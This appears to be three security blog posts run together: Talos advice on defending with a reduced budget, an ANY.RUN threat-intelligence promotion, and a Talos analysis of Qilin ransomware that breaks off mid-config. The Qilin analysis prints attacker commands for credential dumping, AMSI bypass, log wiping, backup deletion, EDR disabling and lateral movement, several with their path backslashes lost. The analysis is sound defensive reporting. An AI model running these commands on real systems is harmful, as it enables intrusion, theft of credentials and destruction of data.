• During economic uncertainty, businesses face the challenge of maintaining strong cybersecurity while managing tightened budgets.  
• Cyber threats can become more numerous, motivated, and persistent during economic downturns, making the need for resilient, cost-effective security measures critical.  
• This blog shares practical strategies to help absorb budget cuts while minimizing the damage to an organization’s cybersecurity posture. 

---

Learning from history 

As many seasoned industry professionals remember, 2008 – 2010 was a tough time for the tech industry as well as the larger U.S. economy. During the Great Recession, unemployment rose as high as 10%, and IT and cybersecurity budgets were certainly not spared. During the 2020 COVID-19 crisis, the need for tech workers and larger IT budgets to support remote work was so strong that it outweighed the global economic slowdown. As a result, many new IT professionals never experienced what a real recession feels like. 

The FBI noted a 22.3% increase in cybercrime complaint submissions from 2008 – 2009, which some attributed in part to unemployed, financially desperate tech workers turning their skillsets to crime. At that time, threat actors mostly targeted individuals in the form of scams, fraud, and other crimes. In today’s environment, a similar economic downturn could easily lead to a surge in the number and talent of ransomware operators. 

Why? Unlike in the Great Recession, most corporate networks are now remote- or hybrid-enabled by default. While nothing about a network’s attack surface would inherently change due to an economic downturn, any increase in the number and skill level of attackers, decrease in the number and skill of defenders, or decrease in the quality of security measures could have devastating consequences for the IT environment owner.

Defend legacy hardware/software 

As was painfully highlighted in recent years by Salt Typhoon incursions into telecommunications networks, working with legacy hardware and software is a risk many businesses take. As belts tighten during an economic downturn, cybersecurity budgets will decrease, and many businesses will inevitably need to postpone technology upgrades beyond end of life. While this introduces risk, there are a few solid strategies to mitigate that risk. 

Defense in depth and zero trust 

While these terms were both solid contenders for the No. 1 Sales Buzzword of 2023, they reflect a valuable underlying principle: Assume the adversary is going to gain a foothold and architect accordingly.  

If a business must continue to use 40% legacy firewalls and only has budget to replace 60%, those legacy firewalls should be positioned in the interior of the network versus on the perimeter and logically separated so an adversary cannot “island-hop” from one to the next using the same vulnerability. If a legacy server must be positioned in a public-facing location, it should be placed in a tightly-controlled DMZ where compromise of that server would not lead to further network intrusion. 

No breach is desirable, but you can minimize the potential for lateral movement. 

Lock down unnecessary functionality 

Many vulnerable applications and systems are targeted via plugins or extra features that an organization isn’t even using. The classic example is a webserver with an abandoned WordPress plugin that later is discovered to be vulnerable. Another example is the SSH login method on a VMWare ESXi hypervisor — an organization may accidentally leave this enabled and allow an adversary to log in as root.  

For vulnerable systems and software, it is critical to review what is strictly necessary for it to operate and disable all other functionalities. This is an important part of attack surface reduction.

Optimize open- and closed-source software 

While closed-source commercial security tools usually offer the easiest setup and best overall experience, transitioning a budget-constrained organization to a blend of commercial and open-source software may be the right answer for maximum efficacy. Here are some rules of thumb for selection. 

Open source 

Open-source software excels when the product does not depend on frequent updates or detailed technical support. Initial setup may be involved and challenging, but financial savings can be significant. A good current example is the Zeek network security monitor, which is not a standalone security product but significantly enhances network-based detection capabilities. An open-source SIEM solution that may be suitable for smaller businesses is Security Onion. 

Closed source/commercial 

For solutions that depend on frequent updates, particularly time-sensitive signature/definition updates, commercial security solutions are the only answer. This primarily includes endpoint detection and response (EDR)/antivirus (AV), firewall, and DNS security solutions. Recognizing that this is a mandatory expenditure will help solidify planning for other areas of cost savings.

Configure what you already have 

For organizations that don’t have the budget for new security systems, making the most of what you already have can go a long way to ensure that basic level of security and hardening is applied. For further information beyond what is reflected below, consider reading this paper on practical security measures for small and/or budget-constrained organizations. 

EDR and antivirus tuning 

Review configuration and policy settings for your existing security investments like AV or EDR solutions. Optimizing them is an easy way to increase security for free. Revisit any policies that were not recently reviewed. Simple configuration changes like turning on heuristic scanning in the AV software can help to catch threats that haven’t been seen before or use more advanced methods of compromise. During the AV/EDR review, checking the exclusions list is always a good idea. As an extreme example that Talos IR has unfortunately seen during incident response, having the whole C: drive excluded prevents any detections at all. Exclusions should be targeted and precise.

Windows domain and cloud policies 

Another powerful, albeit time-consuming, security measure is to optimize Windows domain policies and configurations to help protect the organization. Windows Security baselines, published by Microsoft, are a great starting point. Policy settings like enforcing strong passwords, limiting admin access, and disabling unnecessary features can help tighten security without spending extra money. The CIS also recently published an extensive guide on Active Directory and GPM configuration best practices. For cloud environments, CISA’s SCuBA program offers excellent configuration security guidance.  

PowerShell hardening  

Locking down PowerShell so only trusted users can run it, or setting it to a restricted mode, makes it much harder for attackers to use it against you. The newest versions of PowerShell provide excellent controls, allowing your team to restrict access, limit which scripts can be executed, and configure other granular restrictions, which will help ensure that even if a malicious PowerShell script lands somewhere in the environment, the hardened configuration of PowerShell will limit its functionality.  

Executable neutering 

Various tricks to prevent executables from running by default can be surprisingly effective. For example, changing the default program for opening .js files to Notepad stops these scripts from running. These small changes may seem simple, but together they can create strong layers of defense. For organizations with limited resources, these tweaks can make a big difference in reducing risk without breaking the bank. The following is a very simple PowerShell script which will ensure that malware on unsuspecting user systems is treated as a text file. Of course, these suggestions should be tested and modified to ensure that they do not impair valid enterprise functions.

# List of dangerous file extensions to associate with Notepad 
$extensions = @(".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".ps1", ".cmd", ".bat", ".hta", ".scr") 
foreach ($ext in $extensions) { 
    try { 
        $assoc = New-Object -ComObject WScript.Shell 
        $assoc.RegWrite("HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerFileExts$extUserChoiceProgid", "Applicationsnotepad.exe", "REG_SZ") 
        Write-Host "Set $ext to open with Notepad" 
    } 
    catch { 
        Write-Warning "Failed to set $ext: $_" 
    } 
} 

Figure 1: Sample script to neuter executables.

Logging and alerting optimization 

Assuming you have the storage space, optimizing logging and alerting is a cheap way to improve network security when a breach is likely. A good understanding of which systems are legacy and therefore vulnerable is an excellent starting point — prioritizing visibility on those systems is key.  

Canaries and decoys 

Thoughtful placement of canary tokens, decoy/honey accounts, and other creative countermeasures on vulnerable systems are other mechanisms to quickly detect and shut down an adversary in the network. This is especially important when you start with the assumption that you will be breached at some point due to vulnerable systems or software. 

Firewalls and network filtering 

The majority of organizations have firewalls and network boundary devices deployed across their infrastructure. Tuning these devices to filter high ports and allow for common ports like 80/443 outbound while restricting access to unnecessary services results in the disruption of many command-and-control malware channels, which often try to evade detection by using high ports for communication.

Doing more with less staffing 

An ISC2 survey showed that 24% of cybersecurity departments faced layoffs in 2024, a trend which seems to be continuing into 2025. This was not due to a surplus of cybersecurity staffing. 67% of respondents also agreed that they no longer had the staff to meet their goals. In an economic downturn, this situation would only worsen. It is therefore important to consider how to use the remaining personnel budget as effectively as possible. 

Attract and retain high-quality people 

Recent developments have virtually guaranteed a future shortage of skilled mid-career cybersecurity professionals. First, the glut of cybersecurity talent on the market due to recent layoffs have led to many mid-career professionals taking entry-level jobs. Second, the advent of generative AI has led many organizations to reduce their hiring of entry-level professionals. These two factors have created an extremely hostile environment for recent graduates from cybersecurity educational programs. The authors of this post have personally observed several promising students graduate with cybersecurity degrees and ultimately pivot to unrelated fields due to the lack of opportunity. Unless gen AI advancements truly replace cybersecurity professionals, the current entry-level pipeline collapse may well lead to a shortage of skilled mid-career professionals in the next 5 – 10 years as the replacement rate drops below the rate of retirement and general attrition. 

With that in mind, forward-thinking organizations should take care to attract above-average, early-to-mid career talent and make every effort to train and retain them. It is currently a strong employers’ market, and forward investment now may result in relatively cheap, seasoned employees in the future when the pendulum swings back. 

Quality specialist partners 

In a budget-constrained environment, having a strong relationship with on-demand cybersecurity consultants can be a form of leverage, providing tremendous benefit at a relatively cheap cost. If an organization is large enough to experience a significant cybersecurity incident every week, it would make sense to fully staff an in-house incident response team. However, for most organizations that only experience a few incidents per year, it makes good financial sense to employ a team of cybersecurity generalists and have an incident response provider on retainer for extreme circumstances.  

Using Cisco Talos as an example, not only is an annual retainer with Cisco Talos Incident Response cheaper than employing a single full-time incident responder, but the retaining organization also gets the benefit of a highly-experienced incident response team that deals with major incidents around the globe on a weekly basis. 

Hard decisions are inevitable when the security budget decreases. However, exploring new options to add efficiency can not only protect the organization in the short term, but also provide long-term efficiency gains when budgetary restrictions eventually ease. 

Cisco Talos Blog – ​Read More

No SOC is perfect, but it’s possible to overcome frequent shortcomings and achieve measurable results by introducing one essential component of modern cybersecurity operations: threat intelligence. 

Organizations using ANY.RUN’s TI solutions report the following results: 

• 94% experience faster triage 

• Up to 58% more threats get detected 

• 3x improvement in overall SOC performance  

Quality, real-time threat intelligence helps SOCs tackle their toughest challenges. More on that below. 

#1. Low Detection Rates 

As attackers continuously refine their evasion tactics, low detection rates remain a key challenge for SOC teams. When even one missed threat can quickly escalate into serious operational and reputational risks, businesses can’t afford to overlook this metric. 

Solution: Threat intelligence is a powerful driver for early detection. This alone can radically boost your performance rates. How? Through expanded threat coverage, which is the key mission of Threat Intelligence Feeds. 

By aggregating live attack data from 15,000+ organizations across industries and counties, TI Feeds highlights which malware is targeting real business right now. The result is 99% unique network IOCs that do not overlap with other sources and get carefully filtered to avoid false positives. 

For your business, this means a wide, in-depth, and relevant visibility into the latest threats. That’s what drives the SOC team’s detections up and helps you remain one step ahead of attackers, mitigating the risk of costly disruptions. 

Outcome: 

• Proactive detection – identify emerging threats in your SOC early on. 

• Wide coverage of threats – monitor latest malware and phishing globally. 

• Resources saved – no time and effort is wasted on false positives and escalations. 

#2. Slow Incident Response 

The underlying reasons behind slow incident response often include a lack of automation and alert prioritization. But when incidents miss context, even the most efficient workflow might stall. Timely reaction becomes impossible when analysts have to go through disconnected alerts and bare IOCs. 

Solution: Threat intelligence fueled with live context from ongoing malware investigations allows you to detect threats early on and cut response time dramatically. Each indicator from TI Feeds has a detailed sandbox report behind it. With it, you can see how malware behaves, what processes it affects, and what related IOCs there are.  

Outcome: 

• Full threat visibility – it takes seconds to dig deeper into a malicious sample for actionable insights. 

• Shorter MTTR – 21 min less per incident. 

• Instant threat blocking – integrate TI Feeds with your SIEM, SOAR, or EDR to refine playbooks in real time. 

#3. Large Alert Backlog 

SOC teams must face massive amounts of data, and each unprocessed item awaiting manual investigation is a potential risk. That is why there’s a demand for solutions that work fast and support automated workflows.  

Solution: Efficient TI solutions clear backlogs quickly and ensure that no threat is overlooked, including evasive or hidden threats that might act without showing themselves for months, leading to a system-wide disruption. 

All it takes is one query to investigate a suspicious sample in Threat Intelligence Lookup to learn instantly if it poses danger. When the solution is integrated into your technology stack, this process becomes even smoother and can be scaled up without extra resources. 

Outcome: 

• IOCs enriched in real time – gain actionable insights in under 40 seconds. 

• Smarter decisions – 24x more IOCs per incident and not a single threat missed. 

• Less escalations – threat intel empowers independency in Tier 1 analysts. 

#4. Alert Fatigue and Burnout in Teams 

The human factor has a major impact on cybersecurity. Endless alerts lead to lower productivity of analysts. False positives and lack of ready-to-use threat data cause alert fatigue, a phenomenon that can snowball into serious compromise risks. 

Solution: ANY.RUN delivers clean, reliable threat intelligence retrieved directly from malware analysts, not from third-party sources. This means that every IOC is verified and supplied in real time, allowing to decrease escalations between tiers and empower analysts to conduct proactive hunting and research. 

Outcome: 

• Focus maintained – reliable data makes for informed decisions across tiers. 

• Motivation stays high – quality threat intel without noise lowers the workload. 

• Better results with time saved – automated, streamlined workflow allows for 3x boost in performance rates. 

#5. Lack of Integrity in Solutions 

Enterprises often hesitate to adopt new solutions in fear that they might disrupt the established workflow and demand major changes in current operations. 

Solution: It’s key to consider the possibility of smooth integration that leaves you with a unified, sustainable defense system rather than several standalone services. Threat intelligence should strengthen your ecosystem, not conflict with it. 

ANY.RUN’s TI Lookup and TI Feeds come with a wide range of integrations and connectors from renowned vendors, as well as the possibility for custom integrations through STIX/TAXII & API/SDK. 

Outcome: 

• Enterprise-grade solution – choose integration tailored to your business. 

• Fast incident response – smoothly integrated solutions cut investigation time. 

• Efficient threat blocking – use intelligence to empower instant updates in defensive strategy. 

Conclusion 

Making threat intelligence a part of your workflow brings integrity and sustainability to the entire infrastructure. You can transform common SOC challenges into opportunities for faster detection, smarter response, and overall cybersecurity resilience.  

About ANY.RUN 

Built for modern SOC workflows, ANY.RUN enables teams to detect threats faster and respond with confidence. Our Interactive Sandbox delivers real-time malware analysis and contextual threat intelligence for rapid, informed decisions. 

Compatible with Windows, Linux, and Android, the cloud sandbox provides in-depth behavioral analysis without local configuration. Integrated TI Lookup and TI Feeds supply enriched IOCs and automation-ready intelligence, no infrastructure maintenance required. 

Experience it with a 14-day trial → 

The post 5 SOC Challenges and How Threat Intelligence Solves Them  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

• In the second half of 2025, the ransomware group Qilin has continued to publish victim information on its leak site at a pace of more than 40 cases per month, making it one of the most impactful ransomware groups worldwide. The manufacturing sector has been the most affected, followed by professional and scientific services, and wholesale trade.
• Although this could be a false flag, some of the scripts used by the attacker contained character encodings that point to Eastern Europe or a Russian-speaking region.
• Talos identified an open-source tool named Cyberduck, which enables file transfers to cloud servers, among the tools used for data exfiltration. In recent trends, Cyberduck has been widely abused in cases involving Qilin ransomware. Artifact logs also show the use of notepad.exe and mspaint.exe, which were leveraged to view high-sensitivity information.
• In Qilin cases, we observed dual deployments: encryptor_1.exe spreads via PsExec across hosts, while encryptor_2.exe runs from one system to encrypt multiple network shares.

Summary of Qilin Ransomware

The Qilin (formerly Agenda) ransomware group has been active since around July 2022. This group employs a double-extortion strategy, combining file encryption with the public disclosure of stolen information. Figure 1 illustrates the leak site used by the attackers to publish lists of compromised companies.

Over the past several years, Qilin has expanded its operations and now ranks among the most prolific and damaging ransomware threats on a global scale. The group adopts a Ransomware-as-a-Service (RaaS) business model, where it develops and distributes ransomware platforms and associated tools to affiliates. In turn, these affiliates attack organizations worldwide.

Victimology and prevalence 

Current reporting indicates that the countries most severely affected include the United States, followed by Canada, the United Kingdom, France, and Germany.

Figure 3 illustrates the number of victims whose information was posted on Qilin ransomware leak site.

The data shows that the number of postings reached a peak of 100 cases in June 2025, with a nearly equivalent figure recorded again in August. Although the number of victims fluctuates from month to month, it is noteworthy that, except for January, every month recorded more than 40 cases. These findings indicate that Qilin continues to pose a persistent and significant threat.

The most heavily affected sector is manufacturing, which accounts for approximately 23% of all reported cases, significantly outpacing other industries. The second most impacted sector is professional and scientific services, representing around 18%. Wholesale trade ranks third, with about 10% of cases.

In the mid-range, several key sectors that form part of social infrastructure-healthcare, construction, retail, education, and finance-each report similar levels of impact, averaging around 5%.

At the lower end, sectors such as services and primary industries show relatively fewer incidents, remaining below 2% on average.

Qilin ransomware attack flow

In 2025, Cisco Talos responded to multiple incidents related to Qilin ransomware. The overall attack flow is illustrated in Figure 5, and subsequent sections provide a detailed description of the tactics, techniques, and procedures (TTPs) observed in each phase.

Latest Qilin TTPs

Initial access

Talos was unable to definitively identify a single, confirmed initial intrusion vector. However, in some cases, we assess with moderate confidence that attackers abused administrative credentials leaked on the dark web to gain VPN access, and may have also used Group Policy (AD GPO) changes enabling RDP to reach victim networks.

In the incident illustrated in Figure 6, Talos confirmed that credentials had been exposed on the dark web. Approximately two weeks later, numerous NTLM authentication attempts were made against the VPN, possibly using the leaked credentials. The resulted in a successful intrusion. From the compromised VPN, the attackers performed RDP connections to the domain controller and the initially breached host. While the activity is temporally correlated with the previously observed credential exposure, there is insufficient evidence to establish a definitive causal link between the two events.

Notably, the VPN implicated in this case had no multi-factor authentication (MFA) configured, which would allow an attacker with credentials unfettered access.

Reconnaissance and discovery

After gaining access to the victim’s network, the threat actor executed nltest.exe and net.exe to enumerate domain controllers and collect domain user information.

nltest /dclist:<Domain>
net user <Username> /domain

In addition, traces indicate that the adversary attempted to assess user privilege levels through execution of the whoami command, enumerated active processes such as explorer.exe via the tasklist command, and utilized the netscan tool for further reconnaissance.

C:WINDOWSsystem32whoami.exe /priv
tasklist /FI "IMAGENAME eq explorer.exe" /FO CSV /NH

As described in the “Qilin Ransomware” section below, execution of the ransomware also resulted in enumeration of hostnames, domain users, groups, and privileges.

Credential access and exfiltration

In the cases Talos examined, we identified a password-protected folder containing a collection of tools, apparently intended for credential theft. Although the archive prevented full inspection of every file, its contents suggest use of mimikatz, several password recovery utilities published by NirSoft, and custom script files.

The “!light.bat batch” file includes a reg add command that modifies the WDigest registry setting. By setting “UseLogonCredential” to 1, Windows is configured to retain plaintext logon credentials in memory at authentication, a behavior that can be exploited by credential-dumping tools such as Mimikatz to extract user passwords.

reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /f /d 1

After executing the reg add command, the batch file sequentially invoked netpass.exe, WebBrowserPassView.exe, BypassCredGuard.exe, SharpDecryptPwd, and ultimately Mimikatz. Within the script (see Figure 8), SharpDecryptPwd is configured to extract, redirect, and persist stored authentication data from multiple client applications — including WinSCP, Navicat, Xmanager, TeamViewer, FileZilla, Foxmail, TortoiseSVN, Google Chrome, RDCMan, and SunLogin, thereby consolidating harvested credentials for subsequent use or exfiltration.

Following the execution of SharpDecryptPwd, !light.bat launched Mimikatz. (Figure 9).

Commands executed via Mimikatz targeted a range of sensitive data and system functions, including clearing Windows event logs, enabling SeDebugPrivilege, extracting saved passwords from Chrome’s SQLite database, recovering credentials from previous logons, and harvesting credentials and configuration data related to RDP, SSH, and Citrix.

pars.vbs formatted and consolidated the stolen data into a “result.txt” file, which was subsequently exfiltrated to an attacker-controlled SMTP server (Figure 10). The script specifies the windows-1251 character encoding (Cyrillic), which may suggest the attacker or operator is from Eastern Europe or a Russian-speaking region.

Artifacts of exfiltration

Once collected, WinRAR packaged the targeted data, and in some cases the archives were exfiltrated using open-source software. Below are the actual arguments used to run WinRAR.exe. The WinRAR command is configured to exclude the base folder and to create the archive without recursively processing subdirectories.

C:Program FilesWinRARWinRAR.exe a -ep1 -scul -r0 -iext -imon1 --.  Specify the target files and directories

Furthermore, Talos found that the attackers used mspaint.exe, notepad.exe, and iexplore.exe to open and inspect files while searching through numerous files for sensitive information.

In recent trends, the open-source software Cyberduck — which enables file transfers to cloud servers — has been widely abused in cases involving Qilin ransomware. By abusing legitimate cloud-based services for exfiltration, the attacker can obfuscate their activities within trusted domains and legitimate web traffic. As shown in Figure 12, the Cyberduck history file indicates that a Backblaze host was specified as the destination and that a custom setting for split/multipart uploads was enabled to transfer large files.

Privilege escalation and lateral movement

Using the stolen credentials described above, threat actor proceeds with privilege escalation and lateral movement. Talos has observed compromised accounts accessing multiple IP addresses and their network shares, as well as numerous NTLM authentication attempts against many VPN accounts , possibly using the leaked credentials. Additionally, to enable remote access they modify firewall settings, execute commands to change RDP settings via the registry, and perform related activities such as using rdpclip.exe and similar mechanisms.

reg add HKLMSYSTEMCurrentControlSetControlTerminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

The following command adds a specific account designated by the attacker to the local administrators group. This grants them full control over the system.

C:Windowssystem32net1 localgroup administrators  /add

They also run a command to create a network share named “c” that exposes the entire C: drive and assigns Full Control to the Everyone group, allowing unrestricted access and modification.

net share c=c: /grant : everyone,full

• T1219: Remote Access Software

The attacker installed software that was different from the legitimately used Remote Monitoring and Management (RMM) tools; this occurred before the ransomware was executed. While Talos cannot definitively conclude that the installed RMM was used for lateral movement, traces of multiple RMM tools were observed, including AnyDesk, Chrome Remote Desktop, Distant Desktop, GoToDesk, QuickAssist, and ScreenConnect. Figure 13 shows an excerpt of an actual ScreenConnect connection log, which indicates that ScreenConnect established a connection to the command and control(C2) server on port 8880.

Defense evasion

• Obfuscated Powershell

Figure 14 and Figure 15 show two patterns of obfuscated PowerShell code, encoded using numeric encoding, intended to evade detection

Below is the decoded output of the above code.

[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{}
reg add HKLMSYSTEMCurrentControlSetControlLsa /v DisableRestrictedAdmin /d 0 /t REG_DWORD

Executing these commands makes three configuration changes. First, disabling AMSI prevents interference with execution of payloads such as batch files and malware. Second, disabling TLS certificate validation removes barriers to contacting malicious domains or C2 servers. Finally, enabling Restricted Admin causes RDP authentication to rely on NT hashes or Kerberos tickets rather than passwords. Although passwords are not retained, NT hashes remain on the system and can be abused by an attacker to impersonate the user.

1. Disable AMSI
2. Disable TLS certificate validation
3. Enable Restricted Admin

Disable EDR

Talos observed traces of attempts to disable EDR using multiple methods. Broadly speaking, we have frequently observed commands that directly execute the EDR’s “uninstall.exe” or attempt to stop services using the sc command. At the same time, attackers have also been observed running open-source tools such as dark-kill and HRSword. The commands below are traces of dark-kill usage. Instead of running in normal user mode, dark.sys is specified as a driver loaded into the Windows kernel and the service is started under the name dark. The traces also show that, as needed, attackers re-register a driver from a different path and finally remove the service to erase their tracks.

sc create dark type= kernel binPath=dark.sys
sc start dark
sc create dark type= kernel binPath=C:Users<user>DownloadsDarkKillDebugdark.sys
sc delete dark

Additionally, to execute “HRSword.exe”, attackers attempt to run a batch file with administrator privileges by using VBScript via mshta, specifying the runas option in ShellExecute. Because logs show that a shortcut file HRSword.lnk was created after 1. bat was executed, it is possible that HRSword.exe is being launched via that .lnk file.

mshta vbscript:CreateObject(Shell.Application).ShellExecute(cmd.exe,/c C:UsersxxxxxHRSwordHRSWOR~1.BAT ::,,runas,1)

Impact and inhibit recovery

Before Qilin ransomware is executed, Talos has observed cases in which remote access tools such as Cobalt Strike loader and SystemBC are run. Cobalt Strike was discovered on the compromised host earlier, but it is not clear whether Cobalt Strike installed SystemBC.

Cobalt Strike Loader

The Cobalt Strike loader Talos examined decrypts the encrypted payload contained in the .bss section of the binary shown in Figure 16, then deploys and executes the Cobalt Strike Beacon in memory.

The embedded encrypted payload is executed in memory following the flow shown in Figure 17. The CreateThreadpoolWait and SetThreadpoolWait APIs are Windows thread-pool APIs. Unlike the commonly used CreateThread API (which immediately creates a new thread and begins executing code at a specified address), they wait for events or object state changes and then automatically run worker callbacks.

In this code, the decrypted_buf is registered as the callback function via the arguments to CreateThreadpoolWait, creating a mechanism that will invoke this callback when the wait object becomes signaled. After that, execute permission is granted with VirtualProtect, and a MessageBoxA (shown in the figure and intended for anti-sandbox purposes) prompts for user interaction. When the user clicks OK, SetThreadpoolWait is called. Because EventA was created with an initial signaled state (bInitialState = 1), the decrypted code already mapped into memory runs immediately.

For decryption, a custom routine based on RC4 is implemented: the first 2,048 bytes are fully decrypted, and thereafter decryption is performed in 32-byte units in which only the first 24 bytes are decrypted. The remaining 8 bytes stay encrypted, so this behavior differs from standard RC4.

Cobalt Strike Beacon

The Cobalt Strike Beacon deployed in memory is configured (from its config) as Cobalt Strike version 4.x, with Malleable C2 used to spoof HTTP headers. In this configuration the http_get_header and http_post_header include “Host: ocsp.verisign.com”, effectively separating the visible host header from the actual destination to make the traffic appear as OCSP or certificate distribution traffic. Communication is set to use HTTPS over TCP port 443 to the Team Server (C2).

Qilin Ransomware

In several cases, a variant of Qilin ransomware, known as “Qilin.B”, was used.

This section describes its behavior. For more information, please refer to Halcyon’s analysis article published in October 2024.

Execution method

Attackers sometimes run only a single encryptor, but Talos has also observed cases where two encryptor are deployed. In cases where two encryptor are executed, the first, encryptor_1.exe, was distributed across the environment using PsExec (see the command below). This command copies the local <encryptor_1>.exe to the remote \IP address, elevates it to run with administrative privileges, and then launches it. The other, “encryptor_2.exe”, is executed from a single system and targets multiple network shares.

cmd /C [PsExec] -accepteula \IP Address -c -f -h -d -i
C:Usersxxx<encryptor_1>.exe --password [PASSWORD] --spread --spread-process

PowerShell command executed

A PowerShell command is being executed to efficiently retrieve the hostnames of all computers from Active Directory (AD).

powershell -Command Import-Module ActiveDirectory ; Get-ADComputer -Filter * | Select-Object -ExpandProperty DNSHostName

Another PowerShell command observed is one that installs the Remote Server Administration Tools for AD (the RSAT-AD-PowerShell module). It runs PowerShell cmdlets related to Active Directory Domain Services (AD DS) and Active Directory Lightweight Directory Services (AD LDS). This enables enumeration of domain users, groups, and privileges.

Powershell -Command ServerManagerCmd.exe -i RSAT-AD-PowerShell ; Install-WindowsFeature RSAT-AD-PowerShell ; Add-WindowsCapability -Online -Name 'RSAT.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0' 

Next, the command Get-WinEvent -ListLog * is used to enumerate all event logs on the system. Logs that contain records (where RecordCount is not 0) are filtered, and the .NET EventLogSession.GlobalSession.ClearLog() method is called to wipe them entirely.

powershell $logs = Get-WinEvent -ListLog * | Where-Object {$_.RecordCount} | Select-Object -ExpandProperty LogName ; ForEach ( $l in  $logs | Sort | Get-Unique ) {[System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog($l)}

Finally, the PowerShell script targeting hosts in virtualized environments is hard-coded.

As part of its PowerShell operation, it establishes a connection to the vCenter server, enumerates all datacenters and clusters within the vCenter environment, and disables HA and DRS in cluster configurations. (see Figure 21)

It then enumerates all ESXi hosts, changes the root password, and enables SSH access. Finally, it uploads an arbitrary binary to the “/tmp” directory and executes it across all identified hosts. It makes the binary executable with “chmod +x”, sets “/User/execInstalledOnly” to 0 via the $esxiRights command (thereby allowing execution of unsigned binaries) , and then executes the payload on all hosts using the Process-ESXis function.

For lateral movement

To broaden the scope of file access and increase the impact when ransomware is executed, the fsutil command is also run. This command performs operations on symbolic links; R2R means Remote to Remote (a network share to another network share), and R2L means Remote to Local (a network share to local). By executing these two commands and enabling each respectively, attackers can achieve different effects. for example, in R2R, a symbolic link on server A can be used to reference files on another server B; in R2L, if a shared symbolic link on server A points to a file on the host, an attacker can access the host’s local file through that link. These commands may be executed using PsExec.

cmd /C net use
cmd /C fsutil behavior set SymlinkEvaluation R2R:1
cmd /C fsutil behavior set SymlinkEvaluation R2L:1

Delete backup

The ransomware changes the Volume Shadow Copy Service (VSS) startup type to Manual, and delete all shadow copies (volume snapshots) maintained by VSS.

cmd /C net start vss
cmd /C wmic service where name='vss' call ChangeStartMode Manual
cmd /C vssadmin.exe Delete Shadows /all /quiet
cmd /C net stop vss
cmd /C wmic service where name='vss' call ChangeStartMode Disabled

Ransom note

The ransom note shown in Figure 23 is created in each encrypted folder. The note primarily states that data has been compromised, includes a link to a leak site on a .onion address that requires a Tor connection, and provides a URL (specified by IP address) that can be accessed without Tor for victims who do not have a Tor environment. It also lists the types of data included and warnings about the consequences of ignoring the demands.

In addition, the ‘Credential’ section states that a unique company ID is assigned as a file extension for each victim company, and that by using the domain URL shown in the note one can access the site with that unique login ID and password.

Config

The config for Qilin Ransomware includes file-encryption settings, service and process stop lists, and a list of entity-specific accounts. There are eight items, four of which are as follows:

• “extension_black_list” contains file extensions that will not be encrypted.
• “extension_white_list” specifies the extensions that this ransomware will explicitly encrypt.
• “filename_black_list” lists filenames that will not be encrypted.
• “directory_black_list” lists directories that will not be encrypted.

We also observed two lists named “white_symlink_dirs” and “white_symlink_subdirs”. In the Qilin ransomware sample we analyzed, white_symlink_dirs is empty, and only thing white_symlink_subdirs contains is the entry “ClusterStorage”.

ClusterStorage refers to the directory name used by Windows Server Failover Cluster (Cluster Shared Volumes, or CSV). CSVs commonly host highly critical files for organizations such as Hyper-V virtual machines (VHDX) and databases. This shows the ransomware is intended to increase impact by targeting not only ordinary user directories but also virtualization and cluster infrastructure directly as hostages. Therefore, files in subdirectories of ClusterStorage are explicitly listed as targets to be encrypted. The fact that white_symlink_dirs is empty is likely intended to avoid following symbolic links that could cause infinite loops or double-encryption.

“process_black_list” and “win_services_black_list” specify processes and services to terminate, including those related to databases, backups, security, and remote management. Notably, as shown in Figure 24, this config also had victim-environment-specific domain, username and password hardcoded. This indicates that the attackers preloaded reconnaissance information into the ransomware to facilitate privilege escalation and related activities.

extension_black_list

["themepack", "nls", "diapkg", "msi", "lnk", "exe", "scr", "bat", "drv", "rtp", "msp", "prf", "msc", "ico", "key", "ocx", "diagcab", "diagcfg", "pdb", "wpx", "hlp", "icns", "rom", "dll", 
"msstyles", "mod", "ps1", "ics", "hta", "bin", "cmd", "ani", "386", "lock", "cur", "idx", "sys", "com", "deskthemepack", "shs", "theme", "mpa", "nomedia", "spl", "cpl", "adv", "icl", "msu", "company_id"]

extension_white_list

["mdf", "ldf", "bak", "vib", "vbk", "vbm", "vrb", "vmdk", "abk", "bkz", "sqb", "trn", "backup", "bkup", "old", "tibx", "pfi", "pvhd", "pbf", "dim", "gho", "vpcbackup", "arc", "mtf", "bkf", "dr"]

filename_black_list

["desktop.ini", "autorun.ini", "ntldr", "bootsect.bak", "thumbs.db", "boot.ini", "ntuser.dat", "iconcache.db", "bootfont.bin", "ntuser.ini", "ntuser.dat.log", "autorun.inf", "bootmgr", "bootmgr.efi", "bootmgfw.efi", "#recycle", "autorun.inf", "boot.ini", "bootfont.bin", "bootmgr", "bootmgr.efi", "bootmgfw.efi", "desktop.ini", "iconcache.db", "ntldr", "ntuser.dat", "ntuser.dat.log", "ntuser.ini", "thumbs.db", "#recycle", "bootsect.bak"]

directory_black_list

["windows", "system volume information", "intel", "admin$", "ipc$", "sysvol", "netlogon", "$windows.~ws", "application data", "mozilla", "program files (x86)", "program files", "$windows.~bt", "msocache", "tor browser", "programdata", "boot", "config.msi", "google", "perflogs", "appdata", "windows.old", "appdata", "..", ".", "boot", "windows", "windows.old", "$recycle.bin", "admin$"]

white_symlink_subdirs

["ClusterStorage"]

process_black_list

